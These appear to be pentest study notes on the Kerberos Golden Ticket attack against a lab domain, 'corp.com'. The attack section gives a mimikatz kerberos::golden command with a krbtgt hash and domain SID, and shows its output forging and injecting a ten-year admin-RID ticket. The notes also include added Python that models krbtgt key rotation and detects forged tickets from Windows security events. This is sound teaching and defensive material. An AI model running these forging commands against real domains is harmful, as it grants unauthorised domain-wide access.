When a user requests a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), the KDC encrypts the TGT with a secret known only to the KDC. **That secret is the password hash of the `krbtgt` user account.**
**If we get our hands on the `krbtgt` password hash, we can create our own self-made TGTs, known as Golden Tickets.**
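To make the trust relationship concrete, here is an added toy model (not Kerberos itself, and not code from the original page) of a KDC whose only root of trust for a TGT is the `krbtgt` key. Real TGTs are encrypted with that key; the model uses an HMAC tag over the ticket body as a stand-in, because the property that matters is the same: only a holder of the key can produce a ticket the KDC accepts, and the KDC cannot tell a forged ticket from one it issued. The model also mirrors the fact that a DC keeps the current and previous `krbtgt` key, which is why a single password reset does not invalidate forged tickets but two resets do. The user name and domain SID are taken from the page; the RID and key material are constructed.

```python
"""Toy model of krbtgt as the root of trust for TGTs (constructed example).

Simplification: an HMAC tag stands in for encryption under the krbtgt key.
Key rotation mirrors the KDC keeping the current and previous krbtgt key
(tickets under the previous key still validate after one reset).
"""
import hashlib
import hmac
import json
import secrets
import time

DOMAIN_SID = "S-1-5-21-1987370270-658905905-1781884369"  # from the page


def _tag(key: bytes, body: dict) -> bytes:
    """Bind a ticket body to a key; only a key holder can produce this tag."""
    canonical = json.dumps(body, sort_keys=True).encode()
    return hmac.new(key, canonical, hashlib.sha256).digest()


class ToyKDC:
    def __init__(self):
        self._keys = [secrets.token_bytes(32)]  # index 0 = current krbtgt key

    def issue_tgt(self, user: str, sid: str, lifetime: int = 10 * 3600):
        """Normal AS exchange: a 10-hour TGT for a verified user."""
        now = int(time.time())
        body = {"user": user, "sid": sid, "start": now, "end": now + lifetime}
        return body, _tag(self._keys[0], body)

    def reset_krbtgt(self):
        """One krbtgt password reset: new current key, previous key kept."""
        self._keys = [secrets.token_bytes(32), self._keys[0]]

    def accept(self, ticket) -> bool:
        """The KDC checks validity dates and the tag; it has no other way to
        distinguish a ticket it issued from one built with a stolen key."""
        body, tag = ticket
        now = int(time.time())
        if not body["start"] <= now <= body["end"]:
            return False
        return any(hmac.compare_digest(tag, _tag(k, body)) for k in self._keys)

    def leak_key(self) -> bytes:
        """Stand-in for the krbtgt hash being read from a compromised DC."""
        return self._keys[0]


def forge_tgt(stolen_key: bytes, user: str, sid: str,
              lifetime: int = 10 * 365 * 24 * 3600):
    """With the key, an attacker can mint a ticket with any claims and any
    lifetime; the 10-year default mirrors what the page's mimikatz output shows."""
    now = int(time.time())
    body = {"user": user, "sid": sid, "start": now, "end": now + lifetime}
    return body, _tag(stolen_key, body)


def forged_ticket_lifecycle() -> dict:
    """Show that a forged TGT survives one krbtgt reset but not two."""
    kdc = ToyKDC()
    stolen = kdc.leak_key()
    # Constructed: the forged PAC claims 'jen' is RID 500, as mimikatz does by default.
    forged = forge_tgt(stolen, "jen", f"{DOMAIN_SID}-500")
    results = {"before_reset": kdc.accept(forged)}
    kdc.reset_krbtgt()
    results["after_one_reset"] = kdc.accept(forged)
    legit = kdc.issue_tgt("jen", f"{DOMAIN_SID}-1105")  # assumed RID for jen
    results["legit_after_reset"] = kdc.accept(legit)
    kdc.reset_krbtgt()
    results["after_two_resets"] = kdc.accept(forged)
    return results


if __name__ == "__main__":
    for stage, accepted in forged_ticket_lifecycle().items():
        print(f"{stage:>18}: {'accepted' if accepted else 'rejected'}")
```

The design point for defenders: because validation is purely key-based, the only remediation for a leaked `krbtgt` hash is to reset the account password twice (with enough time between resets for replication), which drops the old key from the KDC's key set and rejects every ticket minted under it.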
Golden Ticket vs Silver Ticket
Silver Tickets forge a TGS (service) ticket to access one specific service; Golden Tickets are a much more powerful attack vector, because a forged TGT gives us access to the entire domain.
NOTE: We must carefully protect stolen krbtgt password hashes because they grant unlimited domain access.
Prerequisites
For a successful attack we need the following:
Access to a Domain Admin account or a compromised Domain Controller.
Attack
Attempting to laterally move
We first try to move laterally with our current ticket and are denied access.
Next we create the Golden Ticket and inject it into memory:
```
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User      : jen
Domain    : corp.com (CORP)
SID       : S-1-5-21-1987370270-658905905-1781884369
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime  : 9/16/2022 2:15:57 AM ; 9/13/2032 2:15:57 AM ; 9/13/2032 2:15:57 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'jen @ corp.com' successfully submitted for current session

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800
```
Verifying Success
We can now try to move laterally again and verify that the attack succeeded.
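The mimikatz output above leaves two detectable traces: the forged TGT was never issued by the KDC (so the lateral move produces a TGS request, Event 4769, with no matching TGT request, Event 4768, for that account), and the forged PAC claims `jen` is RID 500 while the directory holds a different SID for that name (so the resulting logon, Event 4624, carries a SID that does not match the account name). The following detection logic is an added example, not part of the original page; it runs both heuristics over constructed event records. The domain SID and user name come from the page; every other value, including `jen`'s real RID and the directory lookup table, is made up for the example.

```python
"""Two Golden Ticket heuristics run over constructed Security event records.

Heuristic 1: 4769 (TGS request) for an account with no 4768 (TGT issued by the
KDC) in the preceding window. A forged TGT is built offline, so no AS exchange
was ever logged for it.

Heuristic 2: 4624 (logon) whose Security ID differs from the SID the directory
holds for that account name. kerberos::golden uses RID 500 unless /id is given.

All records below are constructed; field names are simplified from the Windows
Security event schema.
"""
from datetime import datetime, timedelta

DOMAIN_SID = "S-1-5-21-1987370270-658905905-1781884369"  # from the page

# Constructed stand-in for an AD lookup (name -> SID the directory holds).
DIRECTORY = {
    "jen": f"{DOMAIN_SID}-1105",            # assumed RID for jen
    "alice": f"{DOMAIN_SID}-1104",          # assumed
    "Administrator": f"{DOMAIN_SID}-500",
}

# Constructed event stream, roughly aligned with the page's ticket timestamps.
EVENTS = [
    {"time": "2022-09-16T02:10:00", "id": 4768, "user": "alice",
     "sid": f"{DOMAIN_SID}-1104"},
    {"time": "2022-09-16T02:12:00", "id": 4769, "user": "alice",
     "service": "cifs/FILES04"},
    # Forged TGT in use: TGS request for jen with no 4768 anywhere before it.
    {"time": "2022-09-16T02:16:30", "id": 4769, "user": "jen",
     "service": "cifs/WEB04"},
    # The logon carries the PAC's RID 500 SID, not the SID the directory holds.
    {"time": "2022-09-16T02:16:31", "id": 4624, "user": "jen",
     "sid": f"{DOMAIN_SID}-500", "logon_type": 3},
]


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def tgs_without_as(events, window=timedelta(days=7)):
    """Return 4769 events whose account had no 4768 within `window` before them.

    The default window covers the default 7-day TGT renewal lifetime, so a
    long-lived but legitimate session is not flagged."""
    findings = []
    for ev in events:
        if ev["id"] != 4769:
            continue
        t = _t(ev["time"])
        had_as = any(
            e["id"] == 4768 and e["user"] == ev["user"]
            and t - window <= _t(e["time"]) <= t
            for e in events
        )
        if not had_as:
            findings.append(ev)
    return findings


def sid_name_mismatch(events, directory):
    """Return 4624 events whose SID disagrees with the directory's SID for that name."""
    findings = []
    for ev in events:
        if ev["id"] != 4624:
            continue
        expected = directory.get(ev["user"])
        if expected is not None and ev["sid"] != expected:
            findings.append(ev)
    return findings


def run(events=EVENTS, directory=DIRECTORY) -> dict:
    """Run both heuristics and return compact findings for reporting."""
    return {
        "tgs_without_as": [(e["user"], e["service"]) for e in tgs_without_as(events)],
        "sid_mismatch": [(e["user"], e["sid"]) for e in sid_name_mismatch(events, directory)],
    }


if __name__ == "__main__":
    for rule, hits in run().items():
        for hit in hits:
            print(f"[{rule}] {hit}")
```

Two caveats when applying this for real: 4768 and 4769 are logged on whichever DC handled the request, so both heuristics only work over events collected centrally from every DC, and the first heuristic needs the window to span the domain's TGT renewal lifetime or it will flag long-lived legitimate sessions.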